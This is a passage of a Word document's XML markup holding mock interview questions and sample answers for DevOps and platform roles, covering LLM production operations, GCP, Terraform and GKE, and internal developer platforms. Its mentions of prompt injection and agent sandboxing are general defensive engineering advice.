      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Front the service with an API gateway handling auth, rate limiting, and request validation, route to the appropriate model (Vertex AI endpoint, self-hosted vLLM, or third-party API) based on task complexity and cost tradeoffs, and cache responses for repeated or semantically similar queries where the use case tolerates it. Instrument full request tracing (prompt, retrieved context, token counts, latency, model version) for debugging, and enforce per-team token budgets and cost alerting so spend stays visible and controlled rather than discovered at the monthly bill.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. A retrieval-augmented generation pipeline returns stale or irrelevant context. How would you debug the vector database, embedding pipeline, chunking strategy, and retrieval ranking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether the underlying source documents have actually been reindexed after updates - stale context is very often simply an indexing pipeline that isn't keeping up with source data changes, not a retrieval algorithm problem. If context is irrelevant rather than stale, evaluate chunk size and overlap (too large dilutes relevance, too small loses context), verify the embedding model matches between indexing and query time, and check retrieval ranking - sometimes the right chunk is retrieved but ranked too low to make the top-k cutoff, which reranking or adjusting k can fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you build an internal LLM gateway that handles authentication, per-team rate limiting, token budget enforcement, and multi-provider fallback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a proxy layer that authenticates each request against team-scoped API keys, enforces per-team rate limits and cumulative token budgets tracked in a fast shared store (Redis), and routes to the configured primary provider with automatic fallback to a secondary on timeout or rate-limit errors. Log every request with team, model, token usage, and cost for accurate attribution, and expose usage dashboards so teams can self-monitor their consumption against their budget.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. A GenAI feature's inference cost grew 5x in a month. How would you investigate token usage, caching opportunities, model selection, and prompt length before cutting features?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break down cost by feature, model, and request type using logged token usage to find exactly what grew and why - a common cause is a prompt template that grew (more context, more few-shot examples) or a shift to a more expensive model without a corresponding quality justification. Look for caching opportunities on repeated or templated queries before considering feature cuts, and evaluate whether a smaller/cheaper model would meet quality requirements for a meaningful portion of traffic, since model selection is often the single biggest cost lever.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you defend an LLM application against prompt injection and data exfiltration from untrusted user input or retrieved documents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat any retrieved or user-supplied content as untrusted data, not instructions - use clear structural separation (delimiters, system-vs-user role boundaries) so the model is less likely to treat embedded text as a command, and validate/filter outputs for signs of instruction-following from injected content. Limit what the model can actually do with a successful injection by keeping tool access scoped and requiring confirmation for sensitive actions, since defense in depth matters more than any single prompt-level mitigation, which can't be made fully robust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. An AI agent can call internal tools and APIs. How would you sandbox tool execution, enforce least privilege, and prevent unintended destructive actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scope each tool's credentials to the absolute minimum permissions needed for that specific action, never granting the agent broad standing access, and require explicit confirmation (human-in-the-loop) for any destructive or hard-to-reverse action rather than allowing full autonomy on those. Run tool execution in an isolated environment separate from the agent's reasoning process, log every tool call with its inputs and outcome for audit, and set hard limits (rate limits, scope restrictions) that can't be overridden by the agent's own reasoning, regardless of how it was prompted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you build an automated evaluation and regression suite for LLM output quality before shipping a prompt or model change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a fixed set of representative test inputs with defined quality criteria (either exact-match for deterministic cases or LLM-as-judge/rubric-based scoring for open-ended ones), and run every prompt or model change against this suite automatically in CI before it can be merged or deployed. Track scores over time to catch gradual regression, not just pass/fail on a single run, and require a human review of any significant score change before promoting the change to production, since automated evaluation can miss subtle quality issues a person would catch immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What would you trace and log for an LLM request end to end, including prompts, retrieved context, token counts, latency, and model version, without leaking sensitive data?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Log the prompt template used (not necessarily raw user input if it contains PII), retrieved context references (document IDs rather than full content where sensitive), token counts and latency broken down by stage (retrieval, inference, post-processing), and the exact model version/deployment that served the request. Redact or hash any detected PII before it reaches logs, and store full unredacted traces (if needed for debugging) in a separate, access-controlled system with a much shorter retention period than regular application logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 44 - Resume Deep-Dive: GCP, Terraform, Kubernetes Platform Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through the GCP landing zone you designed, including project hierarchy, Shared VPC, IAM governance, and policy-as-code. What tradeoffs did you make?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The landing zone used a folder hierarchy separating production and non-production environments, with a Shared VPC host project centralizing networking so application teams got isolated projects without owning network configuration themselves, and org policies enforced consistent guardrails (no public IPs by default, mandatory OS Login) inherited automatically by every new project. The main tradeoff was centralization versus team autonomy - centralizing networking and policy meant faster, more consistent onboarding but required a responsive platform team to handle exception requests quickly, or teams would feel blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. You built reusable Terraform Enterprise modules for networking, IAM, GKE, monitoring, logging, load balancing, and security that cut provisioning effort by 70 percent. Walk me through how you designed and versioned those modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Modules were designed around a minimal, opinionated interface - sensible secure defaults baked in, with only genuinely necessary parameters exposed as required inputs - so consuming teams didn't need deep GCP expertise to use them correctly. Each module was versioned semantically in the private registry, with breaking changes only introduced in major version bumps and clear migration notes, so teams could upgrade deliberately on their own schedule rather than being forced onto every change immediately, which is what made the 70% provisioning time reduction sustainable rather than a one-time win.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. You manage production GKE clusters including node pools, upgrades, autoscaling, and RBAC. Walk me through your process for a zero-downtime cluster upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The process starts with upgrading the control plane (minimal disruption for regional clusters), then performing a surge upgrade on node pools where new nodes are created and workloads migrated before old nodes are drained, respecting PodDisruptionBudgets throughout so minimum replica availability is maintained. Every upgrade is tested against a staging cluster first with the same workload configuration, scheduled during a low-traffic window, and monitored closely with dashboards open so any regression is caught and can be paused or rolled back immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. You integrated Terraform Enterprise with Git-based CI/CD, Harness, Jira, and ServiceNow for self-service delivery. How did approvals and change management work end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A team's infrastructure request started as a pull request against a Terraform configuration repo, triggering a Terraform Enterprise plan automatically posted for review; approved plans applied through Harness pipelines with the actual apply gated behind a ServiceNow change request for anything touching production, linking the technical change to the formal change management process. Jira tracked the originating request end to end, so there was a single traceable thread from business request through technical review, formal approval, and final infrastructure change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. You designed Cloud Armor WAF policies with Adaptive Protection, rate limiting, and threat intelligence, plus IONIX and Stream Security for attack surface monitoring. Walk me through how these tools work together to stop an attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Armor sits at the edge, blocking known attack patterns (OWASP rules) and using Adaptive Protection's machine learning to detect and mitigate anomalous traffic patterns like a novel DDoS pattern in real time, backed by threat intelligence feeds identifying known-bad source IPs. IONIX and Stream Security provide continuous external attack surface monitoring, identifying exposed assets or misconfigurations before an attacker finds them - together this creates layered coverage where attack surface monitoring reduces what's exposed to attack in the first place, and Cloud Armor defends what remains exposed at the point of attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. You reduced GCP cost by 20 percent through governance, resource right-sizing, and capacity planning. Walk me through the specific levers you pulled and how you measured the savings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The main levers were rightsizing over-provisioned Compute Engine and GKE resources based on actual utilization data from Cloud Monitoring, purchasing committed use discounts for the stable baseline workload identified through historical usage analysis, and enforcing cost-allocation labels so waste (idle resources, forgotten test projects) became visible and attributable to specific teams for cleanup. Savings were measured by tracking month-over-month billing export data segmented by the specific optimization applied, isolating the impact of each lever rather than just observing an aggregate total-spend decrease.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. You provisioned GPU-enabled GKE clusters with NVIDIA L4/A100 nodes. How did you handle node pool sizing, taints/tolerations, and spot/preemptible GPUs for cost control?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Sized GPU node pools based on actual workload GPU-memory and compute requirements rather than over-provisioning by default, since GPU capacity is expensive and often scarce, and tainted the pools so only GPU-requesting workloads scheduled there, with matching tolerations on those specific deployments. Used spot/preemptible GPU instances for fault-tolerant training and batch inference workloads to cut cost significantly, reserving on-demand GPU capacity only for latency-sensitive real-time inference that couldn't tolerate preemption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. At 7 years of experience, how would you demonstrate technical leadership across multiple teams during a platform migration, not just individual execution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Technical leadership at that level shows up as setting the migration strategy and phasing so risk is managed deliberately, not just executing tasks - defining the pattern other engineers follow, unblocking teams that hit shared dependencies, and communicating tradeoffs and progress to stakeholders so the migration stays aligned with business priorities. It also means mentoring less experienced engineers through the migration so the knowledge and capability spread beyond just the lead, rather than the migration's success depending entirely on one person's individual effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 45 - Platform Engineering / Internal Developer Platform Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you draw the line between what a platform team owns and what application teams own, and how would you avoid the platform becoming a bottleneck?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The platform team owns shared, cross-cutting infrastructure and the golden paths that encode best practices, while application teams own their own business logic and any configuration genuinely specific to their service. Avoid becoming a bottleneck by making the platform self-service by default (teams don't wait on a ticket for routine needs) and only gating on human review the things that genuinely carry high risk, so the platform team's involvement scales with actual risk rather than every request needing their direct attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design multi-tenancy for an internal developer platform so one team's misconfiguration or spike can't affect another team's workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enforce hard isolation boundaries via namespaces with ResourceQuotas, NetworkPolicies, and RBAC so one team's workload literally cannot consume resources or reach services belonging to another team without explicit cross-team allowance. Apply rate limits and circuit breakers at shared infrastructure chokepoints (a shared API gateway, a shared database) so one team's traffic spike degrades gracefully rather than cascading into an outage for everyone sharing that resource.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What SLAs or SLOs would you define for your own platform team, and how would you measure whether the platform itself is reliable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define SLOs for the platform's own availability (can teams actually deploy and provision when they need to), self-service request success rate and latency (how long does a routine infrastructure request actually take end to end), and the reliability of shared infrastructure the platform provides (CI/CD pipeline success rate, shared cluster uptime). Measure these the same way you'd measure any production service - with real monitoring and error budgets - since a platform that isn't itself reliable undermines every team building on top of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you design self-service ephemeral preview environments for pull requests on top of GKE, Terraform, and CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trigger a CI job on PR open that provisions a lightweight, namespaced deployment of the application (and any needed dependencies) using the same Helm chart/Terraform module as production but scaled down, tagged with the PR number for easy identification, and automatically post the preview environment's URL back to the PR for reviewers. Tear down the environment automatically on PR close/merge via a scheduled cleanup job or a CI hook, so ephemeral environments don't silently accumulate and consume cluster resources indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you prevent manual console changes from undermining your Terraform-based golden paths, without blocking legitimate emergency fixes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Restrict console write access for resources managed by Terraform through IAM, so routine changes must go through the pipeline, while keeping a documented, audited break-glass process for genuine emergencies that grants temporary elevated access with mandatory follow-up. Run scheduled drift detection so any manual change - authorized or not - surfaces quickly, and require any emergency manual change to be reconciled back into Terraform configuration immediately afterward so state doesn't silently diverge from reality long-term.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you design a service catalog that tracks ownership, dependencies, production-readiness status, and on-call rotation for every service on the platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require every service to register metadata (owning team, on-call rotation, Slack channel, dependency list, production-readiness checklist status) at creation time through the golden path template, so the catalog is populated automatically rather than relying on teams to remember to maintain a separate document. Derive dependency mapping from actual tracing/service-mesh data where possible for accuracy, and wire the catalog into other tooling (alert routing, on-call paging) so keeping it updated has a direct, visible benefit to the team maintaining it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you enforce security and compliance guardrails inside a self-service platform without turning every request into a manual approval bottleneck?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bake the guardrails into the golden path defaults (secure-by-default Terraform modules, mandatory labels, enforced NetworkPolicies) so compliant behavior is simply what happens when you use the self-service path, without any manual gate needed for the common case. Reserve manual approval specifically for requests that fall outside the well-understood, pre-validated pattern - genuinely novel or high-risk requests - so the majority of routine requests flow through automatically while risk-appropriate scrutiny still applies to the exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you decide between building a custom internal developer platform versus adopting Backstage, Port, or another off-the-shelf IDP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Adopt an off-the-shelf IDP like Backstage when your needs are largely well-served by its existing plugin ecosystem (service catalog, TechDocs, scaffolding templates) and you want to avoid building and maintaining a UI/framework from scratch. Build custom only when you have genuinely unique requirements that off-the-shelf options don't support well, since the maintenance burden of a custom platform is significant and often underestimated - most organizations get more value faster by extending an established open-source IDP than reinventing its foundational capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 46 - Ansible / Configuration Management Round</w:t>
      </w:r>
    </w:p>
    <w:p>
